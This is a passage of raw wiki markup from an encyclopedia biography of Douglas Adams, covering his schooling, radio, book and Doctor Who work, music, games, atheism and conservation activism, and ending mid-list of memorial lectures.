''[[The Hitchhiker's Guide to the Galaxy]]'', which originated in 1978 as a BBC [[The Hitchhiker's Guide to the Galaxy (radio series)|radio comedy]] before developing into a \"trilogy\" of five books that sold more than 15 million copies in his lifetime and generated a [[The Hitchhiker's Guide to the Galaxy (TV series)|television series]], several stage plays, comics, a [[The Hitchhiker's Guide to the Galaxy (computer game)|computer game]], and in 2005 a [[The Hitchhiker's Guide to the Galaxy (film)|feature film]]. 
Adams's contribution to UK radio is commemorated in [[Radio Academy|The Radio Academy]]'s Hall of Fame.<ref name=\"radioacad\">{{cite web|title=The Radio Academy Hall of Fame |url=http://www.radioacademy.org/hall-of-fame |work=The Radio Academy |accessdate=8 December 2011 |archiveurl=http://www.webcitation.org/63mNGrql2?url=http%3A%2F%2Fwww.radioacademy.org%2Fhall-of-fame%2F |archivedate=8 December 2011 |deadurl=no |df=dmy }}</ref>\n\nAdams also wrote ''[[Dirk Gently's Holistic Detective Agency]]'' (1987) and ''[[The Long Dark Tea-Time of the Soul]]'' (1988), and co-wrote ''[[The Meaning of Liff]]'' (1983), ''[[The Deeper Meaning of Liff]]'' (1990), ''[[Last Chance to See]]'' (1990), and three stories for the television series ''[[Doctor Who]]''; he also served as [[script editor]] for the show's seventeenth season in 1979. A posthumous collection of his works, including an unfinished novel, was published as ''[[The Salmon of Doubt]]'' in 2002.\n\nAdams was known as an advocate for environmentalism and [[conservation movement|conservation]], as a lover of fast cars, cameras, [[technological innovation]] and the [[Apple Macintosh]], and as a \"devout [[atheist]]\".\n\n==Early life==\n<!-- Please leave this section heading as is, for the chronology of events. Adams's own family (wife and daughter) are discussed later. -->\nAdams was born on 11 March 1952 to Janet (née Donovan; 1927–2016) and Christopher Douglas Adams (1927–1985) in [[Cambridge]], England.<ref name=ODNB >Webb 2005b</ref> The following year, [[James D. Watson|Watson]] and [[Francis Crick|Crick]] famously first modelled [[DNA]] at [[Cambridge University]], leading Adams to later quip that he himself (initials DNA) had been in Cambridge months earlier. 
The family moved to [[East End of London|East London]] a few months after his birth, where his sister, Susan, was born three years later.<ref name=Adams_xix>{{Harvnb|Adams|2002|pp=xix}}</ref> His parents divorced in 1957; Douglas, Susan, and their mother moved to an [[RSPCA]] animal shelter in [[Brentwood, Essex]], run by his maternal grandparents.<ref>Webb 2005a, p. 32.</ref>\n\n===Education===\nAdams attended Primrose Hill Primary School in [[Brentwood, Essex|Brentwood]]. At nine, he passed the entrance exam for [[Brentwood School (Essex)|Brentwood School]], an independent school whose alumni include [[Robin Day]], [[Jack Straw]], [[Noel Edmonds]], and [[David Irving]]. [[Griff Rhys Jones]] was a year below him, and he was in the same class as [[Stuckism|Stuckist]] artist [[Charles Thomson (artist)|Charles Thomson]]. He attended the [[Preparatory school (UK)|prep school]] from 1959 to 1964, then the main school until December 1970. His form master, Frank Halford, said of him: \"Hundreds of boys have passed through the school but Douglas Adams really stood out from the crowd — literally. He was unnecessarily tall and in his short trousers he looked a trifle self-conscious.\" \"The form-master wouldn't say 'Meet under the clock tower,' or 'Meet under the war memorial',\" he joked, \"but 'Meet under Adams'.\"<ref name=Adams_7>{{Harvnb|Adams|2002|pp=7}}</ref><ref>Botti, Nicholas. [http://douglasadams.eu/interview-with-frank-halford/ \"Interview with Frank Halford\"]. ''Life, DNA, and H2G2.'' 2009. Web. Retrieved 13 March 2012. (Click on link at bottom for facsimile page from ''Daily News'' article, 7 March 1998.)</ref> Yet it was his ability to write first-class stories that really made him \"shine\".<ref name=Simpson_9>{{Harvnb|Simpson|2003|pp=9}}</ref>\n\nAdams was six feet tall (1.83 m) by age 12 and stopped growing at 6 ft 5 in (1.96 m). 
He became the only student ever to be awarded a ten out of ten by Halford for creative writing, something he remembered for the rest of his life, particularly when facing [[writer's block]].<ref name=Adams_xix />\n\nSome of his earliest writing was published at the school, such as a report on its photography club in ''The Brentwoodian'' in 1962, or spoof reviews in the school magazine ''Broadsheet'', edited by [[Paul Neil Milne Johnstone]], who later became a character in ''The Hitchhiker's Guide''. He also designed the cover of one issue of the ''Broadsheet'', and had a letter and short story published nationally in ''[[Eagle (comic)|The Eagle]]'', the boys' comic, in 1965. A poem entitled \"A Dissertation on the task of writing a poem on a candle and an account of some of the difficulties thereto pertaining\" written by Adams in January 1970, at the age of 17, was discovered by archivist Stacey Harmer in a cupboard at the school in early 2014. In it, Adams rhymes \"futile\" with \"mute, while\" and \"exhausted\" with \"of course did\".<ref>Flood, Alison (March 2014). [http://www.theguardian.com/books/2014/mar/19/lost-school-poems-douglas-adams-griff-rhys-jones \"Lost poems of Douglas Adams and Griff Rhys Jones found in school cupboard\"], ''The Guardian'', 19 March 2014. Accessed 2 July 2014</ref> On the strength of a bravura essay on religious poetry that discussed [[the Beatles]] and [[William Blake]], he was awarded an [[Exhibition (scholarship)|Exhibition]] in English at [[St John's College, Cambridge]], going up in 1971. He wanted to join the [[Footlights]], an invitation-only student comedy club that has acted as a hothouse for comic talent. 
He was not elected immediately as he had hoped, and started to write and perform in revues with Will Adams (no relation) and Martin Smith, forming a group called \"Adams-Smith-Adams\", but became a member of the Footlights by 1973.<ref name=Simpson_30-40>{{Harvnb|Simpson|2003|pp=30–40}}</ref> Despite doing very little work—he recalled having completed three essays in three years—he graduated in 1974 with a B.A. in [[English literature]].<ref name=ODNB/>\n\n==Career==\n\n===Writing===\nAfter leaving university Adams moved back to London, determined to break into TV and radio as a writer. An edited version of the ''Footlights Revue'' appeared on [[BBC Two|BBC2]] television in 1974. A version of the Revue performed live in London's [[West End of London|West End]] led to Adams being discovered by [[Monty Python]]'s [[Graham Chapman]]. The two formed a brief writing partnership, earning Adams a writing credit in [[List of Monty Python's Flying Circus episodes#6. Party Political Broadcast|episode 45]] of ''Monty Python'' for a sketch called \"[[Patient Abuse]]\". He is one of only two people outside the original Python members to get a writing credit (the other being [[Neil Innes]]).<ref name=times>{{cite news|title=Terry Jones remembers Douglas Adams, 'the last of the Pythons'|newspaper=The Times|date=10 October 2009}}</ref> The sketch plays on the idea of mind-boggling paperwork in an emergency, a joke later incorporated into the [[Vogon]]s' obsession with paperwork. Adams also contributed to a sketch on the album for ''[[Monty Python and the Holy Grail]]''.\n\n[[File:DNA in Monty Python.jpg|thumb|Adams in his first ''[[Monty Python's Flying Circus|Monty Python]]'' appearance, in full surgeon's garb]]\n\nAdams had two brief appearances in the fourth series of ''[[Monty Python's Flying Circus]]''. At the beginning of episode 42, \"The Light Entertainment War\", Adams is in a surgeon's mask (as Dr. 
Emile Koning, according to on-screen captions), pulling on gloves, while [[Michael Palin]] narrates a sketch that introduces one person after another but never gets started. At the beginning of episode 44, \"Mr. Neutron\", Adams is dressed in a [[List of recurring Monty Python's Flying Circus characters#The Pepperpots|pepper-pot]] outfit and loads a missile onto a cart driven by [[Terry Jones]], who is calling for scrap metal (\"Any old iron...\"). The two episodes were broadcast in November 1974. Adams and Chapman also attempted non-Python projects, including ''[[Out of the Trees]]''.\n\nAt this point Adams's career stalled; his writing style was unsuited to the then-current style of radio and TV comedy.<ref name=ODNB /> To make ends meet he took a series of odd jobs, including as a hospital porter, barn builder, and chicken shed cleaner. He was employed as a bodyguard by a Qatari family, who had made their fortune in oil. Anecdotes about that job included that the family had once ordered one of everything from a hotel's menu, tried all the dishes, and sent out for hamburgers. Another story had to do with a prostitute sent to the floor Adams was guarding one evening. They acknowledged each other as she entered, and an hour later, when she left, she is said to have remarked, \"At least you can read while you're on the job.\"<ref>Webb 2005a, p. 93.</ref>\n\nDuring this time Adams continued to write and submit sketches, though few were accepted. In 1976 his career had a brief improvement when he wrote and performed ''Unpleasantness at Brodie's Close'' at the [[Edinburgh Fringe]] festival. By Christmas work had dried up again, and a depressed Adams moved to live with his mother.<ref name=ODNB /> The lack of writing work hit him hard and low confidence became a feature of Adams's life; \"I have terrible periods of lack of confidence [..] I briefly did therapy, but after a while I realised it was like a farmer complaining about the weather. 
You can't fix the weather – you just have to get on with it\".<ref name=Adams_prologue>{{Harvnb|Adams|2002|pp=prologue}}</ref>\n\nSome of Adams's early radio work included sketches for ''[[The Burkiss Way]]'' in 1977 and ''[[The News Huddlines]]''.<ref>''Hitchhiker: A Biography of Douglas Adams'' by M. J. Simpson, p87</ref> He also wrote, again with Chapman, the 20 February 1977 episode of ''Doctor on the Go'', a sequel to the ''[[Doctor in the House (TV series)|Doctor in the House]]'' television comedy series. After the [[The Hitchhiker's Guide to the Galaxy (radio series)|first radio series of ''The Hitchhiker's Guide'']] became successful, Adams was made a BBC radio producer, working on ''[[Week Ending]]'' and a pantomime called ''[[Black Cinderella Two Goes East]]''.<ref>Roberts, Jem. ''The Clue Bible: The Fully Authorised History of I'm Sorry I Haven't A Clue from Footlights to Mornington Crescent'': London, 2009, p164-5</ref> He left after six months to become the script editor for ''[[Doctor Who]]''.\n\nIn 1979 Adams and [[John Lloyd (producer)|John Lloyd]] wrote scripts for two half-hour episodes of ''[[Doctor Snuggles]]'': \"The Remarkable Fidgety River\" and \"The Great Disappearing Mystery\" (episodes seven and twelve). John Lloyd was also co-author of two episodes from the original ''Hitchhiker'' radio series (\"Fit the Fifth\" and \"Fit the Sixth\", also known as \"Episode Five\" and \"Episode Six\"), as well as ''[[The Meaning of Liff]]'' and ''[[The Deeper Meaning of Liff]]''.\n\n====''The Hitchhiker's Guide to the Galaxy''====\n{{Main article|The Hitchhiker's Guide to the Galaxy}}\n''The Hitchhiker's Guide to the Galaxy'' was a concept for a science-fiction comedy radio series pitched by Adams and radio producer [[Simon Brett]] to [[BBC Radio 4]] in 1977. 
Adams came up with an outline for a pilot episode, as well as a few other stories (reprinted in [[Neil Gaiman]]'s book ''[[Don't Panic: The Official Hitchhiker's Guide to the Galaxy Companion]]'') that could potentially be used in the series.\n[[File:Towelday-Innsbruck.jpg|thumb|upright|[[Towel Day]] 2005 in Innsbruck, Austria, where Adams first had the idea of ''The Hitchhiker's Guide''. In the novels a towel is the most useful thing a space traveller can have. The annual Towel Day (25 May) was first celebrated in 2001, two weeks after Adams's death.]]\n\nAccording to Adams, the idea for the title occurred to him while he lay drunk in a field in [[Innsbruck]], Austria, gazing at the stars. He was carrying a copy of the ''[[Hitch-hiker's Guide to Europe]]'', and it occurred to him that \"somebody ought to write a ''Hitchhiker's Guide to the Galaxy''\". He later said that the constant repetition of this anecdote had obliterated his memory of the actual event.<ref>{{cite book | author=Adams, Douglas| editor= Geoffrey Perkins (ed.), Additional Material by M. J. Simpson|title=[[The Hitchhiker's Guide to the Galaxy: The Original Radio Scripts]] | page = 10 | edition =25th Anniversary | publisher=Pan Books | year=2003 | isbn=0-330-41957-9}}</ref>\n\nDespite the original outline, Adams was said to make up the stories as he wrote. He turned to [[John Lloyd (producer)|John Lloyd]] for help with the final two episodes of [[The Hitchhiker's Guide to the Galaxy Primary and Secondary Phases#The Primary Phase|the first series]]. Lloyd contributed bits from an unpublished science fiction book of his own, called ''GiGax''.<ref>Webb 2005a, p. 120.</ref> Very little of Lloyd's material survived in later adaptations of ''Hitchhiker's'', such as the novels and the TV series. The TV series was based on the first six radio episodes, and sections contributed by Lloyd were largely re-written.\n\n[[BBC Radio 4]] broadcast the first radio series weekly in the UK in March and April 1978. 
The series was distributed in the United States by [[National Public Radio]]. Following the success of the first series, another episode was recorded and broadcast, which was commonly known as the Christmas Episode. [[The Hitchhiker's Guide to the Galaxy Primary and Secondary Phases#The Secondary Phase|A second series]] of five episodes was broadcast one per night, during the week of 21–25 January 1980.\n\nWhile working on the radio series (and with simultaneous projects such as ''[[The Pirate Planet]]'') Adams developed problems keeping to writing deadlines that only got worse as he published novels. Adams was never a prolific writer and usually had to be forced by others to do any writing. This included being locked in a hotel suite with his editor for three weeks to ensure that ''[[So Long, and Thanks for All the Fish]]'' was completed.<ref>Felch 2004</ref> He was quoted as saying, \"I love deadlines. I love the whooshing noise they make as they go by.\"<ref name=Simpson_236>{{Harvnb|Simpson|2003|pp=236}}</ref> Despite the difficulty with deadlines, Adams wrote five novels in the series, published in 1979, 1980, 1982, 1984, and 1992.\n\nThe books formed the basis for other adaptations, such as three-part comic book adaptations for each of the first three books, an interactive text-adventure [[The Hitchhiker's Guide to the Galaxy (computer game)|computer game]], and a photo-illustrated edition, published in 1994. 
This latter edition featured a [[42 Puzzle]] designed by Adams, which was later incorporated into paperback covers of the first four ''Hitchhiker's'' novels (the paperback for the fifth re-used the artwork from the hardback edition).<ref>[http://www.iblist.com/series.php?id=2 Internet Book List] page, with links to all five novels, and reproductions of the 1990s paperback covers that included the [[42 Puzzle]].</ref>\n\nIn 1980 Adams also began attempts to turn the first ''Hitchhiker's'' novel into a movie, making several trips to Los Angeles, and working with a number of Hollywood studios and potential producers. The next year, the radio series became the basis for a BBC television mini-series<ref>{{citation|url=http://www.imdb.com/title/tt0081874/|title=''The Hitch Hiker's Guide to the Galaxy''|publisher=Internet Movie Database}}</ref> broadcast in six parts. When he died in 2001 in California, he had been trying again to get the movie project started with [[Disney]], which had bought the rights in 1998. The screenplay finally got a posthumous re-write by [[Karey Kirkpatrick]], and [[The Hitchhiker's Guide to the Galaxy (film)|the resulting film]] was released in 2005.\n\nRadio producer [[Dirk Maggs]] had consulted with Adams, first in 1993, and later in 1997 and 2000 about creating a third radio series, based on the third novel in the ''Hitchhiker's'' series.<ref>{{cite book | author=Adams, Douglas. | editor = [[Dirk Maggs]], dramatisations and editor | title=The Hitchhiker's Guide to the Galaxy Radio Scripts: The Tertiary, Quandary and Quintessential Phases | publisher=Pan Books | year=2005|isbn=0-330-43510-8 |pages=xiv | nopp=true}}</ref> They also discussed the possibilities of radio adaptations of the final two novels in the five-book \"trilogy\". As with the movie, this project was only realised after Adams's death. 
The third series, ''[[The Hitchhiker's Guide to the Galaxy Tertiary to Quintessential Phases#The Tertiary Phase|The Tertiary Phase]]'', was broadcast on [[BBC Radio 4]] in September 2004 and was subsequently released on audio CD. With the aid of a recording of his reading of ''Life, the Universe and Everything'' and editing, Adams can be heard playing the part of Agrajag posthumously. ''So Long, and Thanks for All the Fish'' and ''Mostly Harmless'' made up the fourth and fifth radio series, respectively (on radio they were titled ''[[The Hitchhiker's Guide to the Galaxy Tertiary to Quintessential Phases#The Quandary Phase|The Quandary Phase]]'' and ''[[The Hitchhiker's Guide to the Galaxy Tertiary to Quintessential Phases#The Quintessential Phase|The Quintessential Phase]]'') and these were broadcast in May and June 2005, and also subsequently released on Audio CD. The last episode in the last series (with a new, \"more upbeat\" ending) concluded with, \"The very final episode of ''The Hitchhiker's Guide to the Galaxy'' by Douglas Adams is affectionately dedicated to its author.\"<ref>Adams, ''Dirk Maggs'', Page 356.</ref>\n\n====''Dirk Gently'' series====\n[[File:Douglas Adams San Francisco.jpg|thumb|Adams in March 2000]]\nIn between Adams's first trip to Madagascar with [[Mark Carwardine]] in 1985, and their series of travels that formed the basis for the radio series and non-fiction book ''[[Last Chance to See]]'', Adams wrote two other novels with a new cast of characters. ''[[Dirk Gently's Holistic Detective Agency]]'' was first published in 1987, and was described by its author as \"a kind of ghost-horror-detective-time-travel-romantic-comedy-epic, mainly concerned with mud, music and quantum mechanics\".<ref>{{cite book|author=[[Neil Gaiman|Gaiman, Neil]] | title=Don't Panic: Douglas Adams & The Hitchhiker's Guide to the Galaxy | edition=Second U.S. 
| publisher=Titan Books | year=2003 | page=169 | isbn=1-84023-742-2}}</ref> It was derived from two Doctor Who serials Adams had written.\n\nA sequel novel, ''[[The Long Dark Tea-Time of the Soul]]'', was published a year later. This was an entirely original work, Adams's first since ''So Long, and Thanks for All the Fish.'' After the book tour, Adams set off on his round-the-world excursion which supplied him with the material for ''Last Chance to See''.\n\n====''Doctor Who''====\n{{Main article|Doctor Who}}\nAdams sent the script for the ''HHGG'' pilot radio programme to the ''Doctor Who'' production office in 1978, and was commissioned to write ''[[The Pirate Planet]]'' (see below). He had also previously attempted to submit a potential movie script, called \"Doctor Who and the Krikkitmen\", which later became his novel ''Life, the Universe and Everything'' (which in turn became the third ''Hitchhiker's Guide'' radio series). Adams then went on to serve as script editor on the show for its seventeenth season in 1979. Altogether, he wrote three [[List of Doctor Who serials|''Doctor Who'' serials]] starring [[Tom Baker]] as [[The Doctor (Doctor Who)|the Doctor]]:\n* \"[[The Pirate Planet]]\" (the second serial in the \"[[The Key to Time|Key to Time]]\" arc, in [[Doctor Who (season 16)|season 16]])\n* \"[[City of Death]]\" (with producer [[Graham Williams (television producer)|Graham Williams]], from an original storyline by writer [[David Fisher (writer)|David Fisher]]. 
It was transmitted under the pseudonym \"[[David Agnew]]\")\n* \"[[Shada]]\" (only partially filmed; not televised due to [[strike action|industry disputes]])\n\nThe episodes authored by Adams are some of the few that were not novelised as Adams would not allow anyone else to write them, and asked for a higher price than the publishers were willing to pay.<ref>{{cite web|url=http://www.skepticfiles.org/en001/drwhogde.htm |title=A 1990s Doctor Who FAQ |publisher=Skepticfiles.org |accessdate=11 March 2013}}</ref> \"Shada\" was later adapted as a novel by [[Gareth Roberts (writer)|Gareth Roberts]] in 2012 and \"City of Death\" by [[James Goss (producer)|James Goss]] in 2015.\n\nAdams was also known to allow in-jokes from ''The Hitchhiker's Guide'' to appear in the ''Doctor Who'' stories he wrote and other stories on which he served as Script Editor. Subsequent writers have also inserted ''Hitchhiker's'' references, even [[The Rings of Akhaten|as recently as 2013]]. Conversely, at least one reference to ''Doctor Who'' was worked into a ''Hitchhiker's'' novel. In ''[[Life, the Universe and Everything]]'', two characters travel in time and land on the pitch at [[Lord's Cricket Ground]]. The reaction of the radio commentators to their sudden appearance is very similar to the reactions of commentators in a scene in the eighth episode of the 1965–66-story ''[[The Daleks' Master Plan]]'', which has the Doctor's [[TARDIS]] [[Materialization (science fiction)|materialise]] on the pitch at Lord's.\n\nElements of ''Shada'' and ''City of Death'' were reused in Adams's later novel ''[[Dirk Gently's Holistic Detective Agency]]'', in particular the character of [[Professor Chronotis]]. [[Big Finish Productions]] eventually remade ''Shada'' as an audio play starring [[Paul McGann]] as the Doctor. 
Accompanied by partially animated illustrations, it was [[Doctor Who spin-offs#Webcasts|webcast]] on the [[BBC Online|BBC website]] in 2003, and subsequently released as a two-CD set later that year. An omnibus edition of this version was broadcast on the digital radio station [[BBC7]] on 10 December 2005.\n\nIn the ''Doctor Who'' 2012 Christmas episode ''[[The Snowmen#Production|The Snowmen]]'', writer [[Steven Moffat]] was inspired by a storyline that Adams pitched called ''The Doctor Retires''.<ref>{{cite web|last=Moffat |first=Steven |url=http://www.radiotimes.com/news/2012-12-24/doctor-who-christmas-special-steven-moffat-matt-smith-and-jenna-louise-coleman-reveal-all |title=Doctor Who Christmas special: Steven Moffat, Matt Smith and Jenna-Louise Coleman reveal all |work=Radio Times |date=24 December 2012 |accessdate=8 July 2013}}</ref>\n\nWhile he was at school,{{which|date=October 2015}} he wrote and performed a play called ''Doctor Which''.<ref name=Adams_xx>{{Harvnb|Adams|2002|pp=xx}}</ref>\n\n===Music===\nAdams played the guitar left-handed and had a collection of twenty-four left-handed guitars when he died (having received his first guitar in 1964). He also studied piano in the 1960s with the same teacher as [[Paul Wickens]], the pianist who plays in [[Paul McCartney]]'s band (and composed the music for the 2004–2005 editions of the ''Hitchhiker's Guide'' radio series).<ref>Webb, page 49.</ref> [[Pink Floyd]] and [[Procol Harum]] had an important influence on Adams's work.\n\n====Pink Floyd====\n\nAdams included a reference to [[Pink Floyd]] in the original radio version of ''[[The Hitchhiker's Guide to the Galaxy]]'', in which he describes the main characters surveying the landscape of an alien planet while Marvin, their android companion, hums Pink Floyd's \"[[Shine on You Crazy Diamond]]\" (Part 1). This was cut out of the CD version. 
Adams also compared the various noises that the [[kakapo]] makes to \"Pink Floyd studio out-takes\" in his non-fiction book on endangered species, ''[[Last Chance to See]]''.\n\nAdams's official biography shares its name with the song \"[[Wish You Were Here (1975 song)|Wish You Were Here]]\" by Pink Floyd. Adams was friends with Pink Floyd guitarist [[David Gilmour]] and, on Adams's 42nd birthday, he was invited to make a guest appearance at Pink Floyd's concert of 28 October 1994 at Earls Court in London, playing guitar on the songs \"[[Brain Damage (song)|Brain Damage]]\" and \"[[Eclipse (song)|Eclipse]]\".<ref name=Mabbett-MM>{{Cite book |publisher= Omnibus Press |isbn= 978-1-84938-370-7 |last= Mabbett |first= Andy |title= Pink Floyd – The Music and the Mystery |location= London |year= 2010 }}</ref> Adams chose the name for Pink Floyd's 1994 album, ''[[The Division Bell]]'', by picking the words from the lyrics to one of its tracks, \"High Hopes\".<ref name=Mabbett-MM /> Gilmour also performed at Adams's memorial service in 2001, and what would have been Adams's 60th birthday party in 2012.\n\n====Procol Harum====\nAdams was a friend of [[Gary Brooker]], the lead singer, pianist and songwriter of [[Procol Harum]]. Adams invited Brooker to one of the many parties that Adams held at his house. On one such occasion Gary Brooker performed the full (4 verse) version of \"[[A Whiter Shade of Pale]]\". Brooker also performed at Adams's memorial service.\n\nAdams appeared on stage with Brooker to perform \"In Held 'Twas in I\" at Redhill when the band's lyricist [[Keith Reid]] was not available. On several other occasions he introduced Procol Harum at their gigs.\n\nAdams would listen to music while writing, and this would occasionally influence his work. 
On one occasion the title track from the Procol Harum album ''[[Grand Hotel (album)|Grand Hotel]]'' was playing when\n{{quotation|Suddenly in the middle of the song there was this huge orchestral climax that came out of nowhere and did not seem to be about anything. I kept wondering what was this huge thing happening in the background? And I eventually thought ... it sounds as if there ought to be some sort of floorshow going on. Something huge and extraordinary, like, well, like the end of the universe. And so that was where the idea for The Restaurant at the End of the Universe came from.|Douglas Adams|Procol Harum at The Barbican<ref>{{cite web|url=http://www.procolharum.com/dadams.htm |title=Text of one of Douglas Adams's introductions of Procol Harum in concert |accessdate=21 August 2006|last=Adams |first=Douglas |date=8 February 1996}}</ref>}}\n\n===Computer games and projects===\nDouglas Adams created an [[interactive fiction]] version of ''[[The Hitchhiker's Guide to the Galaxy (computer game)|HHGG]]'' with [[Steve Meretzky]] from [[Infocom]] in 1984. In 1986 he participated in a week-long brainstorming session with the [[Lucasfilm Games]] team for the game ''[[Labyrinth: The Computer Game|Labyrinth]]''. Later he was also involved in creating ''[[Bureaucracy (computer game)|Bureaucracy]]'' (also by Infocom, but not based on any book; Adams wrote it as a parody of events in his own life).\n\nAdams was a founder-director and Chief Fantasist of [[The Digital Village]], a digital media and Internet company with which he created ''[[Starship Titanic]]'', a [[Codie]] Award-winning and [[BAFTA#Games Awards|BAFTA-nominated adventure game]], which was published in 1998 by [[Simon & Schuster]].<ref name=\"bbc.co.uk\">BBC Online (no date) [http://www.bbc.co.uk/cult/hitchhikers/dna/biog.shtml \"The Hitchhiker's Guide to the Galaxy: DNA (1952-2001)\"] Accessed 9 July 2014</ref><ref>Botti, Nicolas (2009). 
[http://www.douglasadams.eu/en_adams_bio.php \"Life, DNA & h2g2: Douglas Adams's Biography\"] Accessed 9 July 2014</ref> [[Terry Jones]] wrote the accompanying book, entitled ''Douglas Adams Starship Titanic'', since Adams was too busy with the computer game to do both. In April 1999, Adams initiated the [[h2g2]] [[collaborative writing]] project, an experimental attempt at making ''The Hitchhiker's Guide to the Galaxy'' a reality, and at harnessing the collective brainpower of the internet community. It found a new home at BBC Online in 2001.<ref name=\"bbc.co.uk\"/>\n\nIn 1990 Adams wrote and presented a television documentary programme ''[[Hyperland]]''<ref>[http://www.imdb.com/title/tt0188677/ Internet Movie Database's page for ''Hyperland'']</ref> which featured [[Tom Baker]] as a \"software agent\" (similar to the assistant pictured in Apple's [[Knowledge Navigator]] video of future concepts from 1987), and interviews with [[Ted Nelson]], the co-inventor of [[hypertext]] and the person who coined the term. Although Adams did not invent hypertext, he was an [[early adopter]] and advocate of it. This was the same year that [[Tim Berners-Lee]] used the idea of hypertext in his [[HTML]].\n\n==Personal beliefs and activism==\n\n===Atheism and views on religion===\nAdams described himself as a \"radical [[atheist]]\", adding ''radical'' for emphasis so he would not be asked if he meant agnostic. He told [[American Atheists]] that this made things easier, but most importantly it conveyed the fact that he really meant it. \"I am convinced that there is not a god,\" he said. He imagined a [[Fine-tuned Universe#In popular culture|sentient puddle]] who wakes up one morning and thinks, \"This is an interesting world I find myself in – an interesting hole I find myself in – fits me rather neatly, doesn't it? 
In fact it fits me staggeringly well, must have been made to have me in it!\" to demonstrate his view that the [[fine-tuned Universe]] argument for God was a fallacy.<ref>Adams 1998.</ref>\n\nDespite this, he remained fascinated by religion because of its effect on human affairs. \"I love to keep poking and prodding at it. I've thought about it so much over the years that that fascination is bound to spill over into my writing.\"<ref name=amath>{{cite journal|last=Silverman |first=Dave |title=Interview: Douglas Adams |journal=American Atheist |year=1998–1999 |volume=37 |issue=1 |url=http://www.atheists.org/Interview%3A__Douglas_Adams |accessdate=16 August 2009 |archiveurl=http://www.webcitation.org/63mRFcWVO?url=http%3A%2F%2Fwww.atheists.org%2FInterview%253A__Douglas_Adams |archivedate=8 December 2011 |deadurl=no |df=dmy }}</ref>\n\nIn his 2006 book ''[[The God Delusion]]'', the evolutionary biologist and atheist [[Richard Dawkins]] invokes Adams throughout to illustrate arguments for non-belief. Dawkins dedicated the book to Adams, whom he jokingly called \"possibly [my] only convert\" to atheism,<ref name=\"TheGuardian\">{{cite news|url=http://books.guardian.co.uk/reviews/roundupstory/0,,1939704,00.html |title=Observer, ''The God Delusion'', 5 November 2006|newspaper=[[The Guardian]]|date=5 November 2006 |accessdate=1 June 2009 | location=London | first=Kim | last=Bunce}}</ref> and wrote on his death that \"Science has lost a friend, literature has lost a luminary, the [[mountain gorilla]] and the [[black rhino]] have lost a gallant defender.\"<ref name=Dawkins2001>{{cite news|last=Dawkins|first=Richard|title=Lament for Douglas Adams|url=http://www.guardian.co.uk/uk/2001/may/14/books.booksnews|accessdate=29 December 2012|newspaper=The Guardian|date=13 May 2001}}</ref>\n\n===Environmental activism===\nAdams was also an [[environmental activist]] who campaigned on behalf of [[endangered species]]. 
This activism included the production of the non-fiction radio series ''[[Last Chance to See]]'', in which he and [[natural history|naturalist]] [[Mark Carwardine]] visited rare species such as the [[kakapo]] and [[Chinese river dolphin|baiji]], and the publication of a tie-in book of the same name. In 1992 this was made into a CD-ROM combination of [[audiobook]], [[e-book]] and picture slide show.\n\nAdams and Mark Carwardine contributed the 'Meeting a Gorilla' passage from ''[[Last Chance to See]]'' to the book ''[[Great Ape Project|The Great Ape Project]]''.<ref>{{cite book | author=[[Paola Cavalieri|Cavalieri, Paola]] and [[Peter Singer]], editors | title=The Great Ape Project: Equality Beyond Humanity | edition=U.S. Paperback | publisher=St. Martin's Griffin | year=1994 | pages=19–23|isbn=0-312-11818-X}}</ref> This book, edited by [[Paola Cavalieri]] and [[Peter Singer]], launched a wider-scale project in 1993, which calls for the extension of moral equality to include all great apes, human and non-human.\n\nIn 1994 he participated in a climb of [[Mount Kilimanjaro]] while wearing a rhino suit for the British charity organisation ''[[Save the Rhino|Save the Rhino International]]''. Puppeteer [[William Todd-Jones]], who had originally worn the suit in the London Marathon to raise money and bring awareness to the group, also participated in the climb wearing a rhino suit; Adams wore the suit while travelling to the mountain before the climb began. About £100,000 was raised through that event, benefiting schools in [[Kenya]] and a [[black rhinoceros]] preservation programme in [[Tanzania]]. 
Adams was also an active supporter of the ''[[Dian Fossey]] Gorilla Fund''.\n\nSince 2003, ''Save the Rhino'' has held an annual Douglas Adams Memorial Lecture around the time of his birthday to raise money for environmental campaigns.<ref>{{cite web|url=http://lifednah2g2.blogspot.co.uk/2011/01/ninth-douglas-adams-memorial-lecture.html |title=The Ninth Douglas Adams Memorial Lecture |publisher=Save the Rhino International |accessdate=27 July 2011}}</ref> The lectures in the series are:\n* 2003 [[Richard Dawkins]] – ''Queerer than we can suppose: the strangeness of science''\n* 2004 [[Robert Swan]] – ''Mission Antarctica''\n* 2005 [[Mark Carwardine]] – ''Last Chance to See... Just a bit more''\n* 2006 [[Robert Winston]] – ''Is the Human an Endangered Species?''\n* 2007 [[Richard Leakey]] – ''Wildlife Management in East Africa – Is there a future?''\n* 2008 [[Steven Pinker]] – ''The Stuff of Thought, Language as a Window into Human Nature''\n* 2009 [[Benedict Allen]] – ''Unbreakable''\n* 2010 [[Marcus du Sautoy]] – ''42: the answer to life, the universe and prime numbers''\n* 2011 [[Brian Cox (physicist)|Brian Cox]] – ''The Universe and Why We Should Explore It''\n* 2012 Lecture replaced by \"Douglas Adams The Party\"<ref>{{cite web|url=http://www.savetherhino.org/latest_news/news/287_douglas_adams_the_party |title=Douglas Adams The Party |publisher=Save the Rhino International |accessdate=11 March 2013}}</ref>\n* 2013 [[Adam Rutherford]] – ''Creation: the origin and the future of life''<ref>{{cite web|url=http://www.savetherhino.org/events/476_douglas_adams_memorial_lecture_2013 |title=Douglas Adams Memorial Lecture 2013 |publisher=Save the Rhino International |accessdate=15 August 2012}}</ref>\n* 2014 [[Roger Highfield]] and [[Simon Singh]] – ''The Science of Harry Potter and the Mathematics of The Simpsons''<ref>{{cite web|url=http://www.savetherhino.org/events/798_douglas_adams_memorial_lecture |title=Douglas Adams Memorial Lecture 2014 |publisher=Save the Rhino 
